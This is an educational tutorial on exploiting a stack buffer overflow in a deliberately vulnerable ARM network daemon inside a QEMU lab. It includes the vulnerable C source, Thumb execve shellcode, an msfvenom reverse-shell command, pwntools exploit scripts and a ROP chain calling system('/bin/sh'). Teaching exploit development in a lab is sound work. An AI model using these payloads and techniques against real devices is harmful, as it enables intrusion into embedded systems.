Tutorial

Exploiting an Embedded Service: Buffer Overflow on ARM

Cross-compile a vulnerable network daemon for ARM, exploit a stack buffer overflow with ARM-specific techniques, and build ARM ROP chains in a QEMU/GDB lab.

7 min read advanced
Embedded Exploit Development

Prerequisites

  • Completion of the Buildroot/QEMU cross-compiling tutorial
  • Understanding of stack buffer overflows (see the Linux exploitation series)
  • Basic ARM assembly knowledge helpful but not required
  • GDB experience

Part 5 of 7 in Embedded Systems & Firmware

Table of Contents

The Linux exploitation series covers stack overflows, ROP chains, and ASLR bypasses; all on x86/x64. But the majority of embedded devices run ARM processors: Cortex-A in routers and phones, Cortex-M in microcontrollers, older ARM7/ARM9 in legacy industrial equipment. ARM’s instruction set, calling convention, and stack layout differ from x86 in ways that directly affect how you write exploits.

This tutorial bridges the gap. You’ll cross-compile a vulnerable network service for ARM using the Buildroot toolchain, deploy it to the QEMU environment, and exploit a stack buffer overflow, covering the ARM-specific techniques needed at each step.

ARM vs x86: What’s different for exploit development

Before writing any code, understand the key architectural differences.

Calling convention

On 32-bit x86, function arguments are pushed onto the stack. On ARM (AAPCS, ARM Architecture Procedure Call Standard), the first four arguments go in registers:

x86:                          ARM:
  push arg3                     R0 = arg1
  push arg2                     R1 = arg2
  push arg1                     R2 = arg3
  call function                 R3 = arg4
                                BL function    (Branch with Link)
                                SP → arg5, arg6, ... (if needed)

Return address

On x86, CALL pushes the return address onto the stack, and RET pops it. On ARM, BL (Branch with Link) stores the return address in the Link Register (LR / R14), and functions return with BX LR or POP {PC}.

x86 call:                     ARM call:
  CALL func                    BL func
  → pushes return addr         → LR = return addr
    to stack                     (NOT on stack)
  → RET pops it                → BX LR returns

  Stack has return addr        Stack does NOT have return addr
  → overflow can overwrite it  → ...unless function saves LR

This is the critical difference for exploitation. If a function never pushes LR to the stack, there’s no return address on the stack to overwrite. But any function that calls another function (a non-leaf function) must save LR, and it saves it to the stack with PUSH {LR} in the prologue.

; Leaf function (no stack return address)
leaf_func:
    ADD R0, R1, R2
    BX LR              ; return via LR register

; Non-leaf function (LR saved on stack — exploitable)
nonleaf_func:
    PUSH {R4-R7, LR}   ; save LR and callee-saved regs to stack
    BL some_other_func  ; LR gets overwritten, but old LR is on stack
    ...
    POP {R4-R7, PC}     ; pop saved LR directly into PC → return

The POP {PC} instruction at the end of non-leaf functions is the ARM equivalent of x86’s RET. Overwriting the saved LR value on the stack controls PC on return.

Thumb mode

ARM processors can execute two instruction sets: ARM (32-bit instructions) and Thumb (16-bit instructions, denser code). Most modern ARM binaries use Thumb or Thumb-2. The current mode is indicated by the LSB (least significant bit) of the branch target address:

Address 0x00010000 → ARM mode   (bit 0 = 0)
Address 0x00010001 → Thumb mode (bit 0 = 1)

When building ROP chains, gadget addresses must have the correct LSB for the instruction mode. Using an ARM-mode address to jump into Thumb code (or vice versa) causes an undefined instruction exception.

No x86-style NOP sled

On x86, 0x90 is a single-byte NOP used for NOP sleds. ARM instructions are 4 bytes (or 2 bytes in Thumb). Any MOV Rx, Rx works as a NOP: 0xE1A00000 (MOV R0, R0) in ARM mode, 0x46C0 (MOV R8, R8) in Thumb. Plan your shellcode padding accordingly.

Building the vulnerable target

Create a simple network daemon with a buffer overflow, cross-compile it for ARM, and deploy it to the QEMU Buildroot environment.

The vulnerable service

// vuln_arm.c — a deliberately vulnerable echo server for ARM
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

// Training anchor for the ROP stage. Real targets usually do not hand you this.
// Mark it used so the linker keeps system() and the "/bin/sh" string available.
__attribute__((used))
void keep_system_available(void) {
    system("/bin/sh");
}

void handle_request(int client_fd) {
    char buf[128];
    char response[256];

    // BUG: reads up to 1024 bytes into 128-byte buffer
    int n = recv(client_fd, buf, 1024, 0);
    if (n <= 0) return;
    buf[n < 128 ? n : 127] = '\0';  // won't help — damage already done

    snprintf(response, sizeof(response), "Echo: %s\n", buf);
    send(client_fd, response, strlen(response), 0);
}

int main() {
    int server_fd = socket(AF_INET, SOCK_STREAM, 0);
    int opt = 1;
    setsockopt(server_fd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt));

    struct sockaddr_in addr = {
        .sin_family = AF_INET,
        .sin_port = htons(8888),
        .sin_addr.s_addr = INADDR_ANY,
    };

    bind(server_fd, (struct sockaddr *)&addr, sizeof(addr));
    listen(server_fd, 5);
    printf("Listening on port 8888\n");

    while (1) {
        int client_fd = accept(server_fd, NULL, NULL);
        handle_request(client_fd);
        close(client_fd);
    }
}

Cross-compiling for ARM

Use the Buildroot cross-compilation toolchain from the previous tutorial. Do not hardcode the toolchain tuple; Buildroot names it based on the target ABI you configured.

export BUILDROOT=~/buildroot
export CC="$(find "$BUILDROOT/output/host/bin" -maxdepth 1 -type f -name '*-gcc' | head -1)"
export READELF="$(find "$BUILDROOT/output/host/bin" -maxdepth 1 -type f -name '*-readelf' | head -1)"

# Compile with debug symbols, no stack protector, no PIE, executable stack
$CC -o vuln_arm vuln_arm.c \
    -g -O0 \
    -fno-stack-protector \
    -no-pie \
    -z execstack \
    -static

# Verify the binary
file vuln_arm
# vuln_arm: ELF 32-bit LSB executable, ARM, EABI5 version 1, statically linked, ...

$READELF -W -l vuln_arm | grep GNU_STACK
# GNU_STACK ... RWE ...  (executable stack for Stage 1)

For subsequent stages, remove the executable-stack request:

$CC -o vuln_arm_nx vuln_arm.c \
    -g -O0 \
    -fno-stack-protector \
    -no-pie \
    -static

$READELF -W -l vuln_arm_nx | grep GNU_STACK
# GNU_STACK ... RW ...   (the binary requests a non-executable stack)

Warning

NX depends on the emulated CPU and kernel Removing -z execstack changes the ELF stack permission request. Whether the stack is actually non-executable depends on the kernel and emulated CPU. The older versatilepb/ARM926 target used in the Buildroot lab may not enforce execute-never the way a newer Cortex-A target does. Always verify the runtime mapping in GDB before claiming an NX bypass. If the stack still appears executable, this stage is still useful ARM ROP practice, but it is not demonstrating a real NX bypass on that VM.

Deploying to QEMU

Copy the binary into the Buildroot rootfs and boot:

# Mount the rootfs image
sudo mount -o loop output/images/rootfs.ext4 /mnt
sudo cp vuln_arm /mnt/root/
sudo cp vuln_arm_nx /mnt/root/
sudo umount /mnt

# Boot QEMU with the same configuration from the cross-compiling tutorial,
# adding port 8888 for the vulnerable service
qemu-system-arm \
    -M versatilepb \
    -m 256M \
    -kernel output/images/zImage \
    -dtb output/images/versatile-pb.dtb \
    -drive file=output/images/rootfs.ext4,if=scsi,format=raw \
    -append "root=/dev/sda console=ttyAMA0,115200" \
    -nographic \
    -net nic,model=rtl8139 \
    -net user,hostfwd=tcp::2222-:22,hostfwd=tcp::8888-:8888,hostfwd=tcp::1234-:1234

The hostfwd flags forward port 2222 for SSH, port 8888 for the vulnerable service, and port 1234 for GDB.

Inside the QEMU VM:

# Lab-only: keep stack addresses stable while learning.
echo 0 > /proc/sys/kernel/randomize_va_space

/root/vuln_arm &

When switching to gdbserver, stop the background copy first so it does not keep port 8888 bound:

killall vuln_arm 2>/dev/null || true

Finding the overflow offset

The process is the same as x86, adapted for ARM.

Generating a cyclic pattern

# Using pwntools
python3 -c "from pwn import *; print(cyclic(512).decode())" > pattern.txt

Sending the pattern

#!/usr/bin/env python3
from pwn import *

r = remote('127.0.0.1', 8888)
r.send(cyclic(512))
r.close()

Analyzing the crash in GDB

Run the vulnerable binary under gdbserver inside QEMU:

# In QEMU
gdbserver :1234 /root/vuln_arm

On the host, connect with the ARM-aware GDB:

gdb-multiarch -q vuln_arm
(gdb) set architecture arm
(gdb) target remote :1234
(gdb) continue

After sending the pattern, GDB catches the crash:

Program received signal SIGSEGV, Segmentation fault.
0x61616173 in ?? ()
(gdb) info registers
r0   0x0
r1   0x0
...
r4   0x6161616f   ← controlled (from POP)
r5   0x61616170   ← controlled
r6   0x61616171   ← controlled
r7   0x61616172   ← controlled
sp   0xbefff100
pc   0x61616173   ← controlled! (saved LR popped into PC)

The PC value tells you the offset:

from pwn import *
print(cyclic_find(0x61616173))  # e.g., 144

On ARM, the saved LR is often popped into PC via an epilogue such as POP {R4-R7, PC}. In this example crash, the saved LR on the stack was at offset 144 bytes from the start of the cyclic pattern. Treat that number as a measured result, not a rule. Different compiler versions, optimization levels, frame-pointer settings, and local-variable layouts can move buf, response, padding, and saved registers around.

If your crash lands on a different cyclic value, use your value. If the compiler places response[256] between buf and the saved registers, the offset will be much larger than 144.

Stack layout at overflow:

  Low address
  ┌──────────────┐ ← buf[0]
  │ buf[128]     │
  │ (128 bytes)  │
  ├──────────────┤
  │ saved R4     │ ← offset 128 (4 bytes, controlled)
  ├──────────────┤
  │ saved R5     │ ← offset 132
  ├──────────────┤
  │ saved R6     │ ← offset 136
  ├──────────────┤
  │ saved R7     │ ← offset 140
  ├──────────────┤
  │ saved LR     │ ← offset 144 (→ popped into PC)
  └──────────────┘
  High address

The exact registers saved depend on the function’s prologue. Disassemble handle_request to see what your binary does:

(gdb) disas handle_request
   0x00010504 <+0>:     push    {r4, r5, r6, r7, lr}
   0x00010508 <+4>:     sub     sp, sp, #396
   ...
   0x00010640 <+316>:   pop     {r4, r5, r6, r7, pc}

The prologue pushes R4-R7 and LR. The epilogue pops them back, with LR going directly into PC. In this sample layout, offset to saved LR = buffer size (128) + alignment padding + saved registers (R4-R7 = 16 bytes). Reconfirm this whenever you rebuild.

Stage 1: Shellcode on executable stack

With -z execstack, the stack is executable. This is the simplest case.

ARM shellcode

ARM Thumb shellcode for execve("/bin/sh", NULL, NULL):

# Pure Thumb-mode execve("/bin/sh") shellcode.
# Uses SVC 0 (supervisor call) — the ARM equivalent of x86 INT 0x80
shellcode = (
    b"\x78\x46"           # mov   r0, pc          ; r0 = current addr + 4 (pipeline)
    b"\x08\x30"           # adds  r0, #8          ; r0 -> "/bin/sh" string
    b"\x49\x40"           # eors  r1, r1          ; argv = NULL (Linux accepts this)
    b"\x52\x40"           # eors  r2, r2          ; envp = NULL
    b"\x0b\x27"           # movs  r7, #11         ; r7 = 11 (SYS_execve)
    b"\x00\xdf"           # svc   0               ; syscall
    b"\x2f\x62\x69\x6e"   # "/bin"
    b"\x2f\x73\x68\x00"   # "/sh\0"
)

Note

ARM pipeline and PC reads When you read PC in an instruction, the value isn’t the address of that instruction; it’s the address plus a pipeline offset: +8 in ARM mode, +4 in Thumb mode. This is why MOV R0, PC at address X gives R0 = X + 4 in Thumb. The string begins 12 bytes after the first instruction, so adds r0, #8 moves from X + 4 to X + 12.

Or generate with msfvenom:

msfvenom -p linux/armle/shell_reverse_tcp LHOST=10.0.2.2 LPORT=4444 \
         -f python -b "\x00"

Exploit

#!/usr/bin/env python3
from pwn import *

context.arch = 'arm'
context.endian = 'little'

TARGET = ('127.0.0.1', 8888)
OFFSET_TO_LR = 144  # replace with your cyclic_find result

# Address of buf on the stack — find it in GDB with the -g build:
#   (gdb) break handle_request
#   (gdb) continue
#   (gdb) print &buf
BUF_ADDR = 0xbefff000  # adjust based on your GDB output

# Build payload
payload = b"\xc0\x46" * 40   # Thumb NOP sled (NOP/MOV R8, R8)
payload += shellcode
payload += b"A" * (OFFSET_TO_LR - len(payload))  # pad to saved LR
payload += p32(BUF_ADDR + 1)  # +1 for Thumb mode bit

r = remote(*TARGET)
r.send(payload)
r.close()

Note

The +1 on the return address is critical. ARM uses the LSB to indicate Thumb mode. The payload starts with a Thumb NOP sled and pure Thumb shellcode, so the branch target must have bit 0 set.

Warning

The execve shellcode above spawns /bin/sh locally on the target, but the shell’s stdin/stdout are not connected to the TCP socket. You’ll see the crash in GDB (confirming code execution), but you won’t get an interactive shell over the network. For a practical remote shell, use the msfvenom reverse shell payload shown above, or add dup2 calls to redirect the socket fd to stdin/stdout before the execve.

Stage 2: ROP chain after removing execstack

Recompile without -z execstack. Then verify whether the stack is non-executable at runtime:

# In QEMU
killall vuln_arm vuln_arm_nx 2>/dev/null || true
gdbserver :1234 /root/vuln_arm_nx

# On the host
gdb-multiarch -q vuln_arm_nx
(gdb) set architecture arm
(gdb) target remote :1234
(gdb) continue

# After the process starts
(gdb) info proc mappings
# Look for the stack region:
# rw-p = non-executable stack
# rwxp = executable stack; your VM is not enforcing NX for this mapping

If the stack is rw-p, injected shellcode should fault and ROP is required. If the stack is still rwxp, continue with this section as ROP practice rather than as an NX-bypass claim.

ARM ROP gadgets

ARM ROP gadgets look different from x86. The key chain terminator is POP {PC} (equivalent to x86’s RET), and POP {R0-R3, PC} controls both argument registers and the return address.

Common useful ARM gadgets:

pop {r0, pc}          ← set first argument + chain
pop {r0, r1, pc}      ← set first two arguments + chain
pop {r4, r5, r6, r7, pc}  ← very common (function epilogues)
mov r0, r4; pop {r4, pc}  ← move saved value to arg register
blx r3                ← call function pointer in r3

Finding gadgets

Use ROPgadget or ropper with ARM support:

ROPgadget --binary vuln_arm_nx --arch ARM

# Or with ropper
ropper --file vuln_arm_nx --arch ARM

For a statically linked binary, you’ll find thousands of gadgets. Key ones to locate:

# Find gadgets that control r0 (first argument)
ROPgadget --binary vuln_arm_nx --arch ARM | grep "pop.*r0.*pc"

# Find gadgets that call system functions
ROPgadget --binary vuln_arm_nx --arch ARM | grep "blx r"

Building the chain: system(“/bin/sh”)

For this controlled lab, keep_system_available() intentionally references system("/bin/sh") so the static binary contains both the function and the string. Do not assume this in real targets. In real firmware, confirm symbols and strings first, or build an execve syscall chain instead.

Check the binary before writing the chain:

nm -n vuln_arm_nx | grep ' system$'
ROPgadget --binary vuln_arm_nx --string '/bin/sh'
#!/usr/bin/env python3
from pwn import *

context.arch = 'arm'

elf = ELF('./vuln_arm_nx')
TARGET = ('127.0.0.1', 8888)

# Gadget addresses (from ROPgadget output)
POP_R0_PC = 0x00012345      # pop {r0, pc}
POP_R0_R1_PC = 0x00012400   # pop {r0, r1, pc}
POP_R4_R5_R6_R7_PC = 0x00010580  # pop {r4, r5, r6, r7, pc}
MOV_R0_R4_POP_R4_PC = 0x00020100  # mov r0, r4; pop {r4, pc}

SYSTEM_ADDR = elf.symbols['system']
BIN_SH = next(elf.search(b'/bin/sh\x00'))

print(f"system() @ {hex(SYSTEM_ADDR)}")
print(f"/bin/sh  @ {hex(BIN_SH)}")

# ROP chain
# Goal: system("/bin/sh")
# Need: R0 = address of "/bin/sh", then call system()
rop = b""
rop += p32(POP_R0_PC)      # gadget: pop {r0, pc}
rop += p32(BIN_SH)         # r0 = "/bin/sh"
rop += p32(SYSTEM_ADDR)    # pc = system() — this calls system(r0)

# Build full payload
OFFSET_TO_LR = 144  # replace with your cyclic_find result
payload = b"A" * OFFSET_TO_LR
payload += rop      # overwrites saved LR -> first gadget

r = remote(*TARGET)
r.send(payload)
r.close()

This chain calls system("/bin/sh"), but the shell’s stdio still belongs to the service process, not the TCP socket. Use GDB to prove that PC reaches system, or extend the chain with dup2(client_fd, 0), dup2(client_fd, 1), and dup2(client_fd, 2) before execve if you want an interactive socket shell. That socket-reuse pattern is covered in the remote exploitation tutorial.

ARM-specific ROP challenges

Register setup is indirect. On x86, pop rdi; ret directly sets the first argument register. On ARM, function epilogues pop callee-saved registers (R4-R11) and PC, but not argument registers (R0-R3). You often need a two-step chain:

Step 1: pop {r4, pc}   → load value into r4
Step 2: mov r0, r4; ... ; pop {pc}  → move r4 to r0 (arg register)

BLX vs POP {PC}. BLX (Branch with Link and Exchange) saves the return address in LR, which complicates chaining because the next gadget’s address isn’t on the stack. Prefer gadgets that end with POP {PC} for clean chaining.

Thumb interworking. If some gadgets are in ARM mode and others in Thumb mode, ensure addresses have the correct LSB. Mixed-mode chains are possible but require care.

Debugging ARM exploits with GDB

Useful GDB commands for ARM

# Show all registers including CPSR (flags)
(gdb) info registers

# Show CPSR, including the Thumb-state T bit
(gdb) info registers cpsr

# Override disassembly mode when GDB guesses wrong
(gdb) set arm force-mode thumb
(gdb) disas 0x10504

# Examine stack
(gdb) x/20wx $sp

# Set breakpoint at function epilogue
(gdb) break *0x10640

# Step one instruction
(gdb) stepi

Checking NX from GDB

(gdb) info proc mappings
# Look for the stack region's permissions
# rw-p = non-executable stack
# rwxp = executable stack

Examining the crash

(gdb) info registers pc lr sp
(gdb) x/10i $pc    # disassemble at crash point
(gdb) x/20wx $sp   # examine stack contents

Practical exercise

  1. Cross-compile vuln_arm.c for ARM with executable stack, deploy to QEMU, and find the exact overflow offset using cyclic patterns
  2. Write and test Thumb shellcode that spawns /bin/sh, verify in GDB that execution reaches the execve syscall
  3. Recompile without -z execstack, verify the runtime stack mapping, and confirm whether shellcode-on-stack crashes on your VM
  4. Build an ARM ROP chain to call system("/bin/sh"), verify PC reaches system, then optionally extend the chain with dup2 for a socket-backed shell
  5. Compare the exploit development experience with the x86 tutorials, note how the calling convention and POP {PC} pattern change your approach

If you’re coming from the x86 exploitation series, the mental model translates directly. The details change but the principles are identical: control the instruction pointer, set up arguments, redirect to a useful function.